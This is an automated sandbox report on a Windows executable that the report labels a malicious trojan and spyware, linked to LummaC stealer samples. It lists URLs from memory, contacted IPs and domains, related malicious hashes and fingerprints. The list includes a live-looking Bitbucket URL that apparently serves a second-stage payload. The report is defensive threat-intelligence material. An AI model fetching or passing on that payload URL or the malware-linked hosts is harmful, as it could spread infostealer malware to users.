                                                                                                                                                                                                          https://store.steampowered.com/steam_refunds/EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://remote-app-switcher.prod-east.frontend.public.atl-paas.netEI3TafelpV.exe, 00000000.00000003.1758980695.000000000113D000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758611968.0000000005AC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              http://x1.c.lencr.org/0EI3TafelpV.exe, 00000000.00000003.1539053986.0000000005AE5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                http://x1.i.lencr.org/0EI3TafelpV.exe, 00000000.00000003.1539053986.0000000005AE5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0EI3TafelpV.exe, 00000000.00000002.2026141802.0000000000CBB000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchEI3TafelpV.exe, 00000000.00000003.1490755306.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1490934152.0000000005AE3000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1490831175.0000000005AE3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aEI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1467791586.00000000010FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=eEI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              https://web-security-reports.services.atlassian.com/csp-report/bb-websiteX-Frame-OptionsSAMEORIGINX-EI3TafelpV.exe, 00000000.00000003.1758980695.000000000113D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                https://steamcommunity.com/workshop/EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                  https://support.mozilla.org/products/firefoxgro.allEI3TafelpV.exe, 00000000.00000003.1540566640.0000000005D4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_cEI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                                      https://store.steampowered.com/legal/EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1467791586.00000000010FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&amp;l=enEI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&amp;l=engEI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            		high

                                                                                                                                                                                                                                            World Map of Contacted IPs

                                                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                                                                                                            Public IPs

                                                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                            172.67.157.254
                                                                                                                                                                                                                                            		lev-tolstoi.comUnited States
                                                                                                                                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                            52.216.41.233
                                                                                                                                                                                                                                            		s3-w.us-east-1.amazonaws.comUnited States
                                                                                                                                                                                                                                            		16509AMAZON-02USfalse
                                                                                                                                                                                                                                            23.55.153.106
                                                                                                                                                                                                                                            		steamcommunity.comUnited States
                                                                                                                                                                                                                                            		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                            185.166.143.49
                                                                                                                                                                                                                                            		bitbucket.orgGermany
                                                                                                                                                                                                                                            		16509AMAZON-02USfalse

                                                                                                                                                                                                                                            General Information

                                                                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                            Analysis ID:1579640
                                                                                                                                                                                                                                            Start date and time:2024-12-23 06:53:15 +01:00
                                                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                            Overall analysis duration:0h 6m 17s
                                                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                            Number of analysed new started processes analysed:10
                                                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                                                            Sample name:EI3TafelpV.exe
                                                                                                                                                                                                                                            renamed because original name is a hash value
                                                                                                                                                                                                                                            Original Sample Name:b611471d0d1a21a64700e0a8a9631761.exe
                                                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@2/5@13/4
                                                                                                                                                                                                                                            EGA Information:Failed
                                                                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                                                                                            • Number of executed functions: 0
                                                                                                                                                                                                                                            • Number of non-executed functions: 0
                                                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                                                            • Found application associated with file extension: .exe

                                                                                                                                                                                                                                            Warnings

                                                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 20.42.65.92, 4.245.163.56, 40.126.53.15
                                                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                            • Execution Graph export aborted for target EI3TafelpV.exe, PID 7524 because there are no executed function
                                                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                                            Simulations

                                                                                                                                                                                                                                            Behavior and APIs

                                                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                                                            00:54:15API Interceptor52x Sleep call for process: EI3TafelpV.exe modified
                                                                                                                                                                                                                                            00:55:16API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                                                                                                            IPs

                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            172.67.157.2546S7hoBEHvr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              Neverlose.cc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                Launcher_x64.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  Armanivenntii_crypted_EASY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        v_dolg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                          random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                            alexshlu.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                              ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                52.216.41.233https://tk.didixia.top/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  23.55.153.1066S7hoBEHvr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    uZO96rXyWt.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      Neverlose.cc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        Launcher_x64.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                          WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                            Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              Wave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                                                                  8ZVMneG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog StealerBrowse
                                                                                                                                                                                                                                                                                      185.166.143.49http://jasonj002.bitbucket.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                      • jasonj002.bitbucket.io/

                                                                                                                                                                                                                                                                                      Domains

                                                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                      s3-w.us-east-1.amazonaws.comhttps://cv01zl.s3.amazonaws.com/index.html?AWSAccessKeyId=AKIAWPPO57XS4BTHJAEO&Signature=bBChlGCf3qnCt%2B4WchKJjXtb09k%3D&Expires=1734874865#stewart.thomas@cambridgeshire.gov.ukGet hashmaliciousFake CaptchaBrowse
                                                                                                                                                                                                                                                                                      • 52.217.128.241
                                                                                                                                                                                                                                                                                      https://ho8d1o.s3.amazonaws.com/index.html?AWSAccessKeyId=AKIAWPPO57XS4BTHJAEO&Signature=h4n%2BY6bT0YHF44DbJkmJeHwDnn0%3D&Expires=1734860434#mandy.pullen@peterborough.gov.ukGet hashmaliciousFake CaptchaBrowse
                                                                                                                                                                                                                                                                                      • 52.216.142.68
                                                                                                                                                                                                                                                                                      https://preview.micrasoft-office365.com/f5c275dd184cbe62?l=6Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                      • 54.231.135.57
                                                                                                                                                                                                                                                                                      F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                                                      • 54.231.224.185
                                                                                                                                                                                                                                                                                      D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                                                      • 52.217.32.148
                                                                                                                                                                                                                                                                                      https://i.donotreply.biz/XWTZMVjBsbS9FS1Z2NzBoRzFZMy83RkoxVmlXaWlxaHo3VWFucmtuUGw1enh1ZWNEWVVSRmU5SURkU2psUnlGWUVLSzJtc3hJMVRZeXdZQTdKTVMwOTIySXc0dXRmSmkrKzVTSFFkRTlsZ0sycWdFdnhVY3BJNGx5ZnRmWTFhc0tuTTN1bVNUeUdFYkgrRW9rVllXdnIvNEE4aUgwNlR0R291UUxXUmY2L1JsVnZyNmMvbVpoUGJac04xckVKQlBXLS1PZFpzV3ByWmxpaEJybUhrLS1uMXVPRk5IWXlyNFBPNklpRkk0NTB3PT0=?cid=2330206445Get hashmaliciousKnowBe4Browse
                                                                                                                                                                                                                                                                                      • 3.5.25.98
                                                                                                                                                                                                                                                                                      http://www.kukaj-to.chat/sedoGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                      • 3.5.27.174
                                                                                                                                                                                                                                                                                      fGZLZhXIt1.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                      • 3.5.31.118
                                                                                                                                                                                                                                                                                      V7giEUv6Ee.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                      • 3.5.28.132
                                                                                                                                                                                                                                                                                      BwQ1ZjHbt3.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                      • 3.5.0.126
                                                                                                                                                                                                                                                                                      bitbucket.orgF.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                                                      • 185.166.143.48
                                                                                                                                                                                                                                                                                      D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                                                      • 185.166.143.49
                                                                                                                                                                                                                                                                                      credit.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                      • 185.166.143.48
                                                                                                                                                                                                                                                                                      fGZLZhXIt1.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                      • 185.166.143.48
                                                                                                                                                                                                                                                                                      V7giEUv6Ee.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                      • 185.166.143.50
                                                                                                                                                                                                                                                                                      BwQ1ZjHbt3.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                      • 185.166.143.48
                                                                                                                                                                                                                                                                                      GdGXG0bnxH.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                      • 185.166.143.50
                                                                                                                                                                                                                                                                                      4JwhvqLe8n.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                      • 185.166.143.49
                                                                                                                                                                                                                                                                                      fIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                      • 185.166.143.50
                                                                                                                                                                                                                                                                                      hoTwj68T1D.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                      • 185.166.143.49
                                                                                                                                                                                                                                                                                      steamcommunity.com6S7hoBEHvr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      uZO96rXyWt.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      Neverlose.cc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      Launcher_x64.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      Wave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      8ZVMneG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      qth5kdee.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 104.102.49.254

                                                                                                                                                                                                                                                                                      ASNs

                                                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                      AMAZON-02USmips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                      • 54.171.230.55
                                                                                                                                                                                                                                                                                      trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                      • 108.139.47.92
                                                                                                                                                                                                                                                                                      https://clicks.icims.com/f/a/5aA63l6Vdy8mmO6SfnFRFQ~~/AAIB5gA~/RgRpSzdjP0SjaHR0cHM6Ly9sb2dpbi5pY2ltcy5jb20vdS9yZXNldC12ZXJpZnk_dGlja2V0PVYzbldUZVAzTUxqc0hwVzlXOFlZbFhxamh5SFJZR0tHI2NsaWVudElkPUtKQTk1RHhIT1BOTzU2VWFOUmRSWTU3cHpuNkNNSGNtJmNsaWVudE5hbWU9QXBwbGljYW50IFRyYWNraW5nJmNhbGxiYWNrVXJsPVcDc3BjQgpnZWOyaGeuoGU9UhltaWthLnlhbWFndWNoaUBoYXlzLmNvLmpwWAQAABLwGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                      • 65.9.112.70
                                                                                                                                                                                                                                                                                      https://staging.effimate.toyo.ai-powered-services.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                      • 108.158.71.175
                                                                                                                                                                                                                                                                                      loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                      • 64.252.106.176
                                                                                                                                                                                                                                                                                      loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                      • 54.122.130.248
                                                                                                                                                                                                                                                                                      loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                      • 54.96.126.18
                                                                                                                                                                                                                                                                                      loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                      • 13.247.83.253
                                                                                                                                                                                                                                                                                      hidakibest.ppc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                                                                                                      • 34.249.145.219
                                                                                                                                                                                                                                                                                      hidakibest.arm7.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                                                                                                      • 54.171.230.55
                                                                                                                                                                                                                                                                                      AKAMAI-ASN1EU6S7hoBEHvr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      uZO96rXyWt.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                      • 23.209.72.32
                                                                                                                                                                                                                                                                                      Neverlose.cc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      Launcher_x64.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      Wave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      2.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                      • 172.237.152.235
                                                                                                                                                                                                                                                                                      mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                                                      • 23.211.121.53
                                                                                                                                                                                                                                                                                      CLOUDFLARENETUS6S7hoBEHvr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                                                                                                                                                                                                                      • 162.159.138.232
                                                                                                                                                                                                                                                                                      Rokadernes.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                                                                                      • 104.21.86.72
                                                                                                                                                                                                                                                                                      uZO96rXyWt.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                                                      trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                      • 172.64.41.3
                                                                                                                                                                                                                                                                                      fKdiT1D1dk.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                      • 104.16.249.249
                                                                                                                                                                                                                                                                                      fKdiT1D1dk.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                      • 104.16.248.249
                                                                                                                                                                                                                                                                                      https://clicks.icims.com/f/a/5aA63l6Vdy8mmO6SfnFRFQ~~/AAIB5gA~/RgRpSzdjP0SjaHR0cHM6Ly9sb2dpbi5pY2ltcy5jb20vdS9yZXNldC12ZXJpZnk_dGlja2V0PVYzbldUZVAzTUxqc0hwVzlXOFlZbFhxamh5SFJZR0tHI2NsaWVudElkPUtKQTk1RHhIT1BOTzU2VWFOUmRSWTU3cHpuNkNNSGNtJmNsaWVudE5hbWU9QXBwbGljYW50IFRyYWNraW5nJmNhbGxiYWNrVXJsPVcDc3BjQgpnZWOyaGeuoGU9UhltaWthLnlhbWFndWNoaUBoYXlzLmNvLmpwWAQAABLwGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                      • 162.247.243.29
                                                                                                                                                                                                                                                                                      http://217.28.130.10/8265/568747470733a2f2f6d61696c2d6864656c2e6c7664642e696e666f2f3f656d61696c3d62722e73756e67406864656c2e636f2e6b72Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                      • 172.67.191.167
                                                                                                                                                                                                                                                                                      Echelon.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                      • 172.67.154.166

                                                                                                                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                      a0e9f5d64349fb13191bc781f81f42e16S7hoBEHvr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      • 185.166.143.49
                                                                                                                                                                                                                                                                                      • 52.216.41.233
                                                                                                                                                                                                                                                                                      uZO96rXyWt.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      • 185.166.143.49
                                                                                                                                                                                                                                                                                      • 52.216.41.233
                                                                                                                                                                                                                                                                                      Echelon.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      • 185.166.143.49
                                                                                                                                                                                                                                                                                      • 52.216.41.233
                                                                                                                                                                                                                                                                                      Neverlose.cc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      • 185.166.143.49
                                                                                                                                                                                                                                                                                      • 52.216.41.233
                                                                                                                                                                                                                                                                                      bas.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      • 185.166.143.49
                                                                                                                                                                                                                                                                                      • 52.216.41.233
                                                                                                                                                                                                                                                                                      Wine.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      • 185.166.143.49
                                                                                                                                                                                                                                                                                      • 52.216.41.233
                                                                                                                                                                                                                                                                                      Launcher_x64.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      • 185.166.143.49
                                                                                                                                                                                                                                                                                      • 52.216.41.233
                                                                                                                                                                                                                                                                                      AmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      • 185.166.143.49
                                                                                                                                                                                                                                                                                      • 52.216.41.233
                                                                                                                                                                                                                                                                                      WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      • 185.166.143.49
                                                                                                                                                                                                                                                                                      • 52.216.41.233
                                                                                                                                                                                                                                                                                      external.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      • 185.166.143.49
                                                                                                                                                                                                                                                                                      • 52.216.41.233

                                                                                                                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_EI3TafelpV.exe_bf59f57042f4b733ce4bb27a9947af15741e3496_0c317b0a_e03d8060-ee57-42ec-aa18-5bdbccffafc3\Report.wer

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0407854333462185
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:ItNKxEn0BU/HoFjudxXOfzuiFFZ24IO8kb:IPKxE0BU/wjzzuiFFY4IO8A
                                                                                                                                                                                                                                                                                      MD5:F6F75B5633103BAA6C0D7A5537938A7C
                                                                                                                                                                                                                                                                                      SHA1:37C24E2E3A2CD24137332A927167B0DA4A6476E8
                                                                                                                                                                                                                                                                                      SHA-256:0021444959EB762584ECAAF8B5F60F6857F76CF49A9EA8D9DC0730F9F95E69CC
                                                                                                                                                                                                                                                                                      SHA-512:1BA67A585C1D68E03AB0BAA0E8E29B22EAC53DEAB099F684A9B921F8CF0E157F990C5FDC306DDAA39950646CCB8317A0AC5A4175470E17DA46AC11C276ED06E1
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Reputation:low
